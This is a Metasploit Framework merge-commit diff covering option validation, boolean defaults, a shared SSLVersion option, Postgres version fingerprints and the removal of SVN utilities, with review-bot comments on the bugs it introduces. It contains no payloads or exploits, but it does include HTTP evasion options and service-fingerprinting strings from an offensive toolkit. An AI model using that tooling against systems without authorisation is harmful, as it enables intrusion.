
Merge branch 'master' into land-6691-

This commit is contained in:
Brent Cook 2016-03-24 22:19:57 -05:00
commit 242ea8d9cd
131 changed files with 1265 additions and 857 deletions


@ -114,6 +114,7 @@ m-1-k-3 <m-1-k-3@github> Michael Messner <devnull@s3cur1ty.de>
Meatballs1 <Meatballs1@github> <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> <Meatballs1@users.noreply.github.com>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
net-ninja <net-ninja@github.com> Steven Seeley <steventhomasseeley@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>


@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.11.16)
metasploit-framework (4.11.18)
actionpack (>= 4.0.9, < 4.1.0)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
@ -13,7 +13,7 @@ PATH
metasploit-concern
metasploit-credential (= 1.1.0)
metasploit-model (= 1.1.0)
metasploit-payloads (= 1.1.2)
metasploit-payloads (= 1.1.3)
metasploit_data_models (= 1.3.0)
msgpack
network_interface (~> 0.0.1)
@ -124,7 +124,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.1.2)
metasploit-payloads (1.1.3)
metasploit_data_models (1.3.0)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)



@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.11.16"
VERSION = "4.11.18"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash


@ -27,7 +27,7 @@ class Config < Hash
# @return [String] the base configuration directory
def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797
# Use MSF_CFGROOT_CONFIG environment variable first.
val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG')
if (val and File.directory?(val))
return val


@ -216,7 +216,7 @@ class CommandShell
end
end
if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false)
if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty?
args = Shellwords.shellwords( datastore['InitialAutoRunScript'] )
print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'")
execute_script(args.shift, *args)


@ -37,13 +37,13 @@ module MeterpreterOptions
framework.sessions.schedule Proc.new {
# Configure unicode encoding before loading stdapi
session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false )
session.encode_unicode = datastore['EnableUnicodeEncoding']
session.init_ui(self.user_input, self.user_output)
valid = true
if datastore['AutoVerifySession'] == true
if datastore['AutoVerifySession']
if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i)
print_error("Meterpreter session #{session.sid} is not valid and will be closed")
valid = false
@ -52,7 +52,7 @@ module MeterpreterOptions
if valid
if datastore['AutoLoadStdapi'] == true
if datastore['AutoLoadStdapi']
session.load_stdapi
@ -72,7 +72,7 @@ module MeterpreterOptions
end
[ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
if (datastore[key].empty? == false)
if !datastore[key].empty?
args = Shellwords.shellwords( datastore[key] )
print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
session.execute_script(args.shift, *args)
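Review bot: `session.encode_unicode = datastore['EnableUnicodeEncoding']` now hands the session the raw datastore value, which is nil (not false) when the option is unset, and would be the literal string typed by the user if the value arrived through a path that records no option to normalize against (this commit's `store` only normalizes when `@options[k]` is set) — a string such as "false" is truthy. That is harmless if `encode_unicode` is only ever tested for truthiness, but if anything downstream compares it with `== true`/`== false` (not visible here) the removed `? true : false` coercion was load-bearing. `session.encode_unicode = !!datastore['EnableUnicodeEncoding']` keeps the attribute boolean at no cost.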


@ -84,7 +84,7 @@ module VncInjectOptions
print_status("Local TCP relay started.")
# If the AUTOVNC flag is set, launch VNC viewer.
if (datastore['AUTOVNC'] == true)
if datastore['AUTOVNC']
if (session.autovnc(datastore['ViewOnly']))
print_status("Launched vncviewer.")
else


@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler
OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']),
OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]),
OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]),
Opt::SSLVersion
], self.class
)


@ -13,6 +13,7 @@ class DataStore < Hash
# Initializes the data store's internal state.
#
def initialize()
@options = Hash.new
@imported = Hash.new
@imported_by = Hash.new
end
@ -26,6 +27,14 @@ class DataStore < Hash
@imported[k] = false
@imported_by[k] = nil
opt = @options[k]
unless opt.nil?
unless opt.valid?(v)
raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"])
end
v = opt.normalize(v)
end
super(k,v)
end
@ -65,17 +74,11 @@ class DataStore < Hash
# all of the supplied options
#
def import_options(options, imported_by = nil, overwrite = false)
options.each_option { |name, opt|
# If there's already a value defined for this option, then skip it
# and don't import it.
next if self.has_key?(name) and overwrite == false
# If the option has a default value, import it, but only if the
# datastore doesn't already have a value set for it.
if ((opt.default != nil) and (overwrite or self[name] == nil))
import_option(name, opt.default.to_s, true, imported_by)
options.each_option do |name, opt|
if self[name].nil? || overwrite
import_option(name, opt.default, true, imported_by, opt)
end
}
end
end
#
@ -124,13 +127,14 @@ class DataStore < Hash
#
def import_options_from_hash(option_hash, imported = true, imported_by = nil)
option_hash.each_pair { |key, val|
import_option(key, val.to_s, imported, imported_by)
import_option(key, val, imported, imported_by)
}
end
def import_option(key, val, imported=true, imported_by=nil)
def import_option(key, val, imported=true, imported_by=nil, option=nil)
self.store(key, val)
@options[key] = option
@imported[key] = imported
@imported_by[key] = imported_by
end
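Review bot: In `import_option`, `self.store(key, val)` runs before `@options[key] = option`, so the first import of an option reaches the new validation in `store` with `@options[k]` still nil: the default is neither checked with `opt.valid?` nor passed through `opt.normalize`, and only later `set` calls on that key are. If that ordering is intentional — `import_options` now imports nil defaults as well, and a required option with no default would otherwise fail `valid?` at import time — say so with a comment such as `# store first: defaults are imported unvalidated; the option is only recorded for later sets`, because a re-import with `overwrite` does hit the validation and the asymmetry is easy to "fix" by reordering the two lines. Separately, `['', ', try harder'].sample` makes the OptionValidateError message nondeterministic, which gets in the way of tests and log matching; a fixed message is preferable. The `store` method begins before its hunk.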


@ -163,14 +163,4 @@ class Msf::DBManager
true
end
# Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6.
# Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond.
def warn_about_rubies
if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/
$stderr.puts "**************************************************************************************"
$stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/"
$stderr.puts "**************************************************************************************"
end
end
end


@ -537,7 +537,7 @@ protected
#
def find_context_key(buf, badchars, state)
# Make sure our context information file is sane
if File.exists?(datastore['ContextInformationFile']) == false
if !File.exists?(datastore['ContextInformationFile'])
raise NoKeyError, "A context information file must specified when using context encoding", caller
end
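Review bot: `File.exists?` is the deprecated alias (newer Rubies warn on it and later drop it); since the line is being rewritten anyway, use `File.exist?`. Also, when `ContextInformationFile` is unset, `datastore['ContextInformationFile']` is nil and `File.exist?(nil)` raises TypeError before the intended NoKeyError is reached, so the "must be specified" message never appears for the most common mistake; `unless datastore['ContextInformationFile'] && File.exist?(datastore['ContextInformationFile'])` covers both cases. `find_context_key` continues beyond the hunk.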


@ -1506,7 +1506,7 @@ protected
# required when wanting to support context keyed encoding
#
def define_context_encoding_reqs(reqs)
return if datastore['EnableContextEncoding'] != true
return unless datastore['EnableContextEncoding']
# At present, we don't support any automatic methods of obtaining
# context information. In the future, we might support obtaining


@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),
Opt::SSLVersion,
OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout'])
@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient
#
# Remaining evasions to implement
#
# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']),
# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]),
# OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]),
], self.class
)


@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer
register_evasion_options(
[
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']),
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]),
OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache'])
], Exploit::Remote::HttpServer
@ -86,7 +86,7 @@ module Exploit::Remote::HttpServer
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!"
end
end
@ -530,16 +530,16 @@ module Exploit::Remote::HttpServer
response.compress = datastore['HTTP::compression']
end
if (datastore['HTTP::chunked'] == true)
if datastore['HTTP::chunked']
response.auto_cl = false
response.transfer_chunked = true
end
if (datastore['HTTP::header_folding'] == true)
if datastore['HTTP::header_folding']
response.headers.fold = 1
end
if (datastore['HTTP::junk_headers'] == true)
if datastore['HTTP::junk_headers']
response.headers.junk_headers = 1
end
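Review bot: `use_zlib` now raises whenever zlib is absent regardless of the setting, because `HTTP::compression` is an OptEnum whose default is the string `'none'` and any non-nil string is truthy in Ruby; the old `== true` comparison could never match a string (dead code), and the new one is over-eager in the opposite direction. Test the enum value instead: `if !Rex::Text.zlib_present? && datastore['HTTP::compression'] != 'none'`. A one-line comment, `# HTTP::compression is an enum ('none', 'gzip', 'deflate'), not a boolean`, would stop the same mistake recurring.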


@ -292,6 +292,8 @@ module Exploit::Remote::Postgres
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database
when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host
# Windows


@ -588,7 +588,7 @@ module Msf
if profile.nil?
print_status("Browsing directly to the exploit URL is forbidden.")
send_not_found(cli)
elsif profile[:tried] and datastore['Retries'] == false
elsif profile[:tried] && !datastore['Retries']
print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
send_not_found(cli)
else


@ -64,7 +64,7 @@ module Msf
register_options(
[
Opt::RHOST,
OptInt.new('RPORT', [ true, 'Set the SMB service port', 445])
OptPort.new('RPORT', [ true, 'The SMB service port', 445])
], Msf::Exploit::Remote::SMB::Client)
register_autofilter_ports([ 139, 445])


@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC
register_evasion_options(
[
OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']),
OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]),
], Msf::Exploit::Remote::SunRPC
)
@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC
}
)
if datastore['ONCRPC::tcp_request_fragmentation'] == true
if datastore['ONCRPC::tcp_request_fragmentation']
self.rpcobj.should_fragment = 1
end


@ -64,7 +64,7 @@ module Exploit::Remote::Tcp
register_advanced_options(
[
OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]),
Opt::SSLVersion,
OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]),
OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']),
Opt::Proxies,
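Review bot: Replacing the local OptEnum with `Opt::SSLVersion` silently changes the client default from `'TLS1'` to `'Auto'`, which the ssl_tcp.rb hunk maps to `:SSLv23`, so every outgoing TLS connection now auto-negotiates instead of pinning TLS 1.0; the floor of that negotiation depends on the local OpenSSL build and its default options, which nothing in this diff sets. Wide negotiation is a defensible default for a client that must reach old targets, but it is a behavior change that neither the option description nor the commit message mentions; a comment at the call site such as `# Opt::SSLVersion defaults to 'Auto' (SSLv23 negotiation); previously pinned to 'TLS1'` would record it.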


@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer
[
OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]),
# SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment)
# OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]),
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),


@ -38,14 +38,6 @@ class Framework
Revision = "$Revision$"
# Repository information
RepoRevision = ::Msf::Util::SVN.revision
RepoUpdated = ::Msf::Util::SVN.updated
RepoUpdatedDays = ::Msf::Util::SVN.days_since_update
RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly
RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date
RepoRoot = ::Msf::Util::SVN.root
# EICAR canary
EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted?


@ -266,11 +266,10 @@ class Module
end
#
# Returns true if this module is being debugged. The debug flag is set
# by setting datastore['DEBUG'] to 1|true|yes
# Returns true if this module is being debugged.
#
def debugging?
(datastore['DEBUG'] || '') =~ /^(1|t|y)/i
datastore['DEBUG']
end
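Review bot: `debugging?` now returns the raw datastore value, and the comment being removed shows `DEBUG` is set freeform (`1|true|yes`) rather than through a registered OptBool; for a key with no recorded option this commit's `store` keeps the string as typed, so `set DEBUG false` or `set DEBUG 0` yields a truthy value and `debugging?` reports true. Unless DEBUG is registered as an OptBool somewhere not visible here, keep a string-tolerant check: `datastore['DEBUG'].to_s =~ /\A(1|t|y)/i`. The doc comment should then keep the accepted spellings rather than dropping them.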
#


@ -60,15 +60,15 @@ module Msf::Module::Deprecated
#
# @return [void]
def print_deprecation_warning
print_warning("*"*72)
print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*")
print_warning("*"*90)
print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*")
if deprecation_date
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*")
end
if replacement_module
print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
print_warning("*"+"Use #{replacement_module} instead".center(88)+"*")
end
print_warning("*"*72)
print_warning("*"*90)
end
def init_ui(input = nil, output = nil)


@ -14,9 +14,8 @@ module Msf::Module::UI::Message
def print_prefix
prefix = ''
if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || (
framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i
)
if datastore['TimestampOutput'] ||
(framework && framework.datastore['TimestampOutput'])
prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] "
xn ||= datastore['ExploitNumber']
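Review bot: The second operand, `framework.datastore['TimestampOutput']`, reads the framework-wide datastore, and as far as this commit shows values are only normalized when a registered option is recorded for the key (`@options[k]` in `store`); a user who ran `setg TimestampOutput false` would therefore get the string `"false"`, which is truthy, and every line would be timestamped. The regex being removed tolerated exactly that. Unless global values are normalized somewhere not visible here, keep a string-aware test on the framework side, e.g. `(framework && framework.datastore['TimestampOutput'].to_s =~ /\A(t|y|1)/i)`. `print_prefix` continues past the end of this hunk.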


@ -1,21 +1,21 @@
module Msf::Module::UI::Message::Verbose
# Verbose version of #print_error
def vprint_error(msg='')
print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
# Verbose version of #print_good
def vprint_good(msg='')
print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
# Verbose version of #print_status
def vprint_status(msg='')
print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
# Verbose version of #print_warning
def vprint_warning(msg='')
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
end
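Review bot: All four methods repeat the same condition, `datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])`; factoring it into one `verbose?` predicate keeps them in sync and gives a single place to deal with the framework-wide datastore, where a `setg VERBOSE false` may be stored as the truthy string "false" unless a registered option normalizes it (not visible here, worth confirming). `!framework.nil? && …` also reads more naturally as `framework && …`, which is the form `print_prefix` uses in this same commit.
```ruby
def vprint_error(msg='')
  print_error(msg) if verbose?
end

# … unchanged: vprint_good / vprint_status / vprint_warning, each now guarded by verbose? …

# True when VERBOSE is set on this module's datastore or on the framework's.
def verbose?
  datastore['VERBOSE'] || (framework && framework.datastore['VERBOSE'])
end
```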


@ -147,11 +147,6 @@ module Msf
# @param klass [Class<Msf::Module>] The module class
# @return [void]
def auto_subscribe_module(klass)
# If auto-subscribe has been disabled
if (framework.datastore['DisableAutoSubscribe'] and
framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/)
return
end
# If auto-subscription is enabled (which it is by default), figure out
# if it subscribes to any particular interfaces.


@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
def each_module_reference_name(path, opts={})
whitelist = opts[:whitelist] || []
::Dir.foreach(path) do |entry|
if entry.downcase == '.svn'
next
end
full_entry_path = ::File.join(path, entry)
type = entry.singularize


@ -51,6 +51,13 @@ module Msf
Msf::OptPort.new(__method__.to_s, [ required, desc, default ])
end
# @return [OptEnum]
def self.SSLVersion
Msf::OptEnum.new('SSLVersion', [ false,
'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto',
['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']])
end
# These are unused but remain for historical reasons
class << self
alias builtin_chost CHOST
@ -69,6 +76,7 @@ module Msf
Proxies = Proxies()
RHOST = RHOST()
RPORT = RPORT()
SSLVersion = SSLVersion()
end
end


@ -7,24 +7,17 @@ module Msf
# Network port option.
#
###
class OptPort < OptBase
class OptPort < OptInt
def type
return 'port'
end
def normalize(value)
value.to_i
end
def valid?(value)
return false if empty_required_value?(value)
if ((value != nil and value.to_s.empty? == false) and
((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535)))
return false
if !required? and value.to_s.empty?
super
else
super && normalize(value) <= 65535 && normalize(value) >= 0
end
return super
end
end
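Review bot: The range check in `valid?` goes through `normalize(value)`, i.e. `value.to_i`, which maps "abc" to 0 and "80abc" to 80, so rejecting non-numeric input now rests entirely on `OptInt#valid?` (reached via `super`, not visible here); the local `^\d+$` guard that used to do this is gone. If OptInt accepts such strings, `set RPORT 80abc` becomes port 80 silently, so either confirm that `OptInt#valid?` rejects them or restore a local check before the range test. Style: `if !required? and value.to_s.empty?` mixes `!` with the low-precedence `and`; `if !required? && value.to_s.empty?` is the conventional form, and `(0..65535).cover?(normalize(value))` reads better than the two comparisons.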


@ -13,7 +13,7 @@ class OptRaw < OptBase
end
def normalize(value)
if (value =~ /^file:(.*)/)
if (value.to_s =~ /^file:(.*)/)
path = $1
begin
value = File.read(path)


@ -29,7 +29,7 @@ class OptRegexp < OptBase
def normalize(value)
return nil if value.nil?
return Regexp.compile(value)
return Regexp.compile(value.to_s)
end
def display_value(value)


@ -13,7 +13,7 @@ class OptString < OptBase
end
def normalize(value)
if (value =~ /^file:(.*)/)
if (value.to_s =~ /^file:(.*)/)
path = $1
begin
value = File.read(path)


@ -10,7 +10,7 @@ module Msf::Payload::Ruby
[
# Since space restrictions aren't really a problem, default this to
# true.
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ])
]
)
end


@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate
# for discussion.
#
def prepend_migrate?
!!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true')
datastore['PrependMigrate']
end
#


@ -3,36 +3,6 @@
# Provides some sanity checks against the ruby build and version
#
# Check for the broken pack/unpack in OS X 10.4.x
if ([1].pack('n') == "\x01\x00")
$stderr.puts "*** This ruby build has a broken pack/unpack implementation! "
if (RUBY_PLATFORM =~ /darwin/)
$stderr.puts " Apple shipped a broken version of ruby with the 10.4.x "
$stderr.puts " release. Please install ruby from source, or use one of "
$stderr.puts " the free package managers to obtain a working ruby build."
end
exit(0)
end
# Check for ruby 1.8.2 as the minimal supported version
if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/)
$stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+"
exit(0)
end
# Check for ruby 1.9.0 and throw a big nasty warning
if (RUBY_VERSION =~ /^1\.9\.0/)
$stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer."
exit(0)
end
# Check for ruby 1.9.1 and throw a warning
if (RUBY_VERSION =~ /^1\.9\.1/)
$stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer."
end
if(RUBY_PLATFORM == 'java')
require 'socket'
s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP)
@ -56,56 +26,3 @@ rescue ::LoadError
$stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!"
$stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more"
end
#
# Check for the ugly 1.8.7 short-named constants bug
#
class ConstBugTestA
Const = 'A'
def test
Const == 'A'
end
end
ConstBugTestC = ConstBugTestA.dup
class ConstBugTestB < ConstBugTestC
Const = 'B'
end
def ruby_187_const_bug
bugged = false
begin
ConstBugTestA.new.test()
ConstBugTestB.new.test()
rescue ::NameError
bugged = true
end
bugged
end
if(ruby_187_const_bug())
$stderr.puts ""
$stderr.puts "***********************************************************************"
$stderr.puts "*** *"
$stderr.puts "*** This version of the Ruby interpreter contains a serious bug *"
$stderr.puts "*** related to short-named constants, we strongly recommend that you *"
$stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *"
$stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *"
$stderr.puts "*** your vendor and ask them to review the URL below. *"
$stderr.puts "*** *"
$stderr.puts "*** Alternatively, you can download, build, and install the latest *"
$stderr.puts "*** stable snapshot of Ruby from the following URL: *"
$stderr.puts "*** - http://www.ruby-lang.org/ *"
$stderr.puts "*** *"
$stderr.puts "*** For more information, please see the following URL: *"
$stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *"
$stderr.puts "*** *"
$stderr.puts "***********************************************************************"
$stderr.puts ""
end


@ -2178,10 +2178,15 @@ class Core
return true
end
if append
datastore[name] = datastore[name] + value
else
datastore[name] = value
begin
if append
datastore[name] = datastore[name] + value
else
datastore[name] = value
end
rescue OptionValidateError => e
print_error(e.message)
elog(e.message)
end
print_line("#{name} => #{datastore[name]}")
@ -2193,7 +2198,6 @@ class Core
# @param str [String] the string currently being typed before tab was hit
# @param words [Array<String>] the previously completed words on the command line. words is always
# at least 1 when tab completion has reached this stage since the command itself has been completed
def cmd_set_tabs(str, words)
# A value has already been specified
@ -2837,16 +2841,8 @@ class Core
# Returns the revision of the framework and console library
#
def cmd_version(*args)
svn_console_version = "$Revision: 15168 $"
svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil
if svn_metasploit_version
print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}")
else
print_line("Framework: #{Msf::Framework::Version}")
end
print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}")
return true
print_line("Framework: #{Msf::Framework::Version}")
print_line("Console : #{Msf::Framework::Version}")
end
def cmd_grep_help
@ -3523,7 +3519,7 @@ class Core
next if not o
# handle a search string, search deep
if(
if (
not regex or
o.name.match(regex) or
o.description.match(regex) or
@ -3537,7 +3533,7 @@ class Core
mod_opt_keys = o.options.keys.map { |x| x.downcase }
opts.each do |opt,val|
if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val)
if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val)
show = false
end
end


@ -154,8 +154,7 @@ class Exploit
else
# If we didn't run a payload handler for this exploit it doesn't
# make sense to complain to the user that we didn't get a session
disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false
unless disable_handler
unless mod.datastore["DisablePayloadHandler"]
fail_msg = 'Exploit completed, but no session was created.'
print_status(fail_msg)
begin


@ -139,13 +139,13 @@ class Driver < Msf::Ui::Driver
self.disable_output = false
# Whether or not command passthru should be allowed
self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true
self.command_passthru = opts.fetch('AllowCommandPassthru', true)
# Whether or not to confirm before exiting
self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false
self.confirm_exit = opts['ConfirmExit']
# Disables "dangerous" functionality of the console
@defanged = opts['Defanged'] == true
@defanged = opts['Defanged']
# If we're defanged, then command passthru should be disabled
if @defanged
@ -659,7 +659,7 @@ protected
def unknown_command(method, line)
[method, method+".exe"].each do |cmd|
if (command_passthru == true and Rex::FileUtils.find_full_path(cmd))
if command_passthru && Rex::FileUtils.find_full_path(cmd)
print_status("exec: #{line}")
print_line('')


@ -21,7 +21,3 @@ end
# Executable generation and encoding
require 'msf/util/exe'
# Parse SVN entries
require 'msf/util/svn'


@ -1,120 +0,0 @@
# -*- coding: binary -*-
###
#
# framework-util-svn
# --------------
#
# The class provides methods for parsing the SVN information in the framework directory
#
###
require 'date'
module Msf
module Util
class SVN
def self.load_root
info = {}
path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries")
if !::File.exists?(path)
return info
end
contents = ''
File.open(path, "rb") do |fd|
contents = fd.read(::File.size(path))
end
if contents.include? "<?xml"
require 'rexml/document'
rd = REXML::Document.new(contents).root
rd.elements.each { |e|
if e.attributes['name'] == ""
info[:root] = e.attributes['url']
info[:revision] = e.attributes['revision']
info[:updated] = e.attributes['committed-date']
break
end
}
else
ents = contents.split("\x0c")
ents[0].split("\n").each do |line|
line.strip!
next if line.empty?
case line
when /framework3/
info[:root] = line
when /^\d+$/
info[:revision] = line.to_i
when /^\d{4}-\d.*T/
info[:updated] = line
end
break if (info[:root] and info[:revision] and info[:updated])
end
end
info
end
def self.revision
@@info ||= load_root
@@info[:revision]
end
def self.updated
@@info ||= load_root
@@info[:updated]
end
def self.root
@@info ||= load_root
@@info[:root]
end
def self.days_since_update
@@info ||= load_root
svnt = @@info[:updated]
if(not svnt)
return
end
# Date.parse and Date.strptime are both broken beyond repair in
# ruby 1.8.6 and older. Just bail if the parsing doesn't work.
begin
diff = (Date.parse(Time.now.to_s) - Date.parse(svnt)).to_f
rescue ArgumentError
end
end
def self.last_updated_friendly
diff = self.days_since_update
case diff
when nil
"at an unknown date"
when -2.0 .. 1.0
"today"
when 1.0 .. 2.0
"yesterday"
else
if (diff.to_i > 7)
"%red#{diff.to_i} days ago%clr"
else
"#{diff.to_i} days ago"
end
end
end
def self.last_updated_date
